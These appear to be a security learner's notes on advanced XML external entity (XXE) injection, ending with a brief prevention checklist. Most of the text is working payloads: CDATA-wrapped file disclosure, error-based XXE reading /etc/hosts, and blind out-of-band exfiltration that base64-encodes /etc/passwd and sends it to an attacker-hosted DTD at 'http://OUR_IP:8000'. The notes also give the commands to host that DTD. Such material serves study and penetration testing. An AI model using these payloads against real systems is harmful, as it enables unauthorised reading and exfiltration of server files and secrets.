advance-xxe

Advanced file disclosure:

Advanced exfiltration with CDATA

To extract any type of data, bypassing format restrictions and enabling the inclusion of special characters or binary data (escape special characters).

First:

<!DOCTYPE email [
  <!ENTITY begin "<![CDATA[">
  <!ENTITY file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY end "]]>">
  <!ENTITY joined "&begin;&file;&end;">
]>

This will not work, since XML prevents joining internal and external entities. So we have to utilize special character % to bypass this limitation.

Second:

echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd

Third:

python3 -m http.server

Forth:

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>

Fifth:

<email>&joined;</email>

Error based XXE

If the web application does not show any output with XXE injection in the web page and displays runtime error, or does not have proper exception handling for XML input (none of the XML entities displayed).

This method has length limitations.

1. Test this vulnerability and show error (using error technique to show data):

&nonExistingEntity;

1. Host a DTD file and setup server

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

1. Call our external DTD script and reference the error entity

<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %error;
]>

Delete other XML data and keep above payload only.

Blind data exfiltration (No error, No output)

Out-of-band data exfiltration

1. Python3 -m http.server

2. Redirect the output to our server

3. Payload (xxe.dtd):

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

1. Reference our entity

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

1. Python3 server did not work, use PHP server

Automated OOB exfiltration

XXEinjector

XXE Prevention

Avoid using outdated components

Using safe XML configurations

• Disable referencing custom Document Type Definitions (DTDs)

• Disable referencing External XML Entities

• Disable Parameter Entity processing

• Disable support for XInclude

• Prevent Entity Reference Loops

• Disable runtime errors

• Use JSON or YAML